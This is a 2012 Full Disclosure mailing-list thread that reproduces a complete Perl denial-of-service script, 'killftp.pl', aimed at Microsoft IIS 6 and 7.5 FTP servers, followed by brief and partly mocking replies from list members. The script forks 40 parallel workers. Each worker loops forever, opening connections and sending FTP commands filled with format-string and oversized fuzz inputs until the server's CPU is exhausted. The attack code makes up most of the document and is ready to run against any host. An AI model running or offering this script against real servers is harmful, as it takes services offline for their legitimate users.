Hi OK i will plus they didn't fix
http://seclists.org/fulldisclosure/2012/Jul/27
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of
Service (CPU exhaustion)
# Date: June 29, 2012
# Author: coolkaveh
# coolkaveh () rocketmail com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven ,
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#When sending multiple parallel FTP command requests to a Microsoft
IIS FTP Server
#CPU usage goes up to max capacity and server gets non responsive.
test it with two core
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
print "Please DISABLE firewall daemon of this operating system first!\n";
print "FTP Server Remote Denial Of Service\n";
print "by coolkaveh\n";
print "usage: perl killftp.pl <host> \n";
print "example: perl killftp.pl www.example.com \n";
}
$host=shift;
$port=shift || "21";
if(!defined($host)){
print "Please DISABLE firewall daemon of this operating system first!\n";
print "FTP Server Remote Denial Of Service\n";
print "by coolkaveh\n";
print "coolkaveh () rocketmail com\n";
print "usage: perl killftp.pl <host> \n";
print "example: perl killftp.pl www.example.com \n";
exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
print "$host -> $port is alive.\n";
$check_first->close;
}
else{
die("$host -> $port is closed!\n");
}
@junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,
'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s',
'%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100',
'0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1',
);
@command=(
'NLST','CWD','STOR','RETR',
'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE
L','TYPE I','NLST','CWD', 'STOR','RETR','MKD',
'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
'HELP','MODE','APPE','STRU','SITE','SITE INDEX',
'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM',
'SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE
INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I',
'NLST','CWD','STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE',
'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE
I','NLST','CWD','STOR','RETR','MKD','RMD','DELE',
'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
INDEX','TYPE','TYPE A','TYPE E',
'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
);
print "Dosing Server!\n";
$pm = new Parallel::ForkManager(40);
while (1) {
my $pid = $pm->start and next;
COMMAND_LIST: foreach $cmd (@command){
foreach $poc (@junk){
LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port, Proto=>'tcp', Timeout=>30);
if(defined($sock4)){
$sock4->send("$cmd"." "."$poc\r\n", 0);
$sock4->recv($content, 100, 0);
}
}
}
$pm->finish;
}
On Mon, Jul 16, 2012 at 11:54 AM, Григорий Братислава
<musntlive () gmail com> wrote:
On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami
<kavehghaemmaghami () googlemail com> wrote:
Hello list
in my testing environment (IIS 6 with php5 ) the flaw exist ..... i
think i got da move to XAMPP MS wont patch it LOL
Test environment is not production environment. Is place your test
server in your production network and is send me information for to
test.
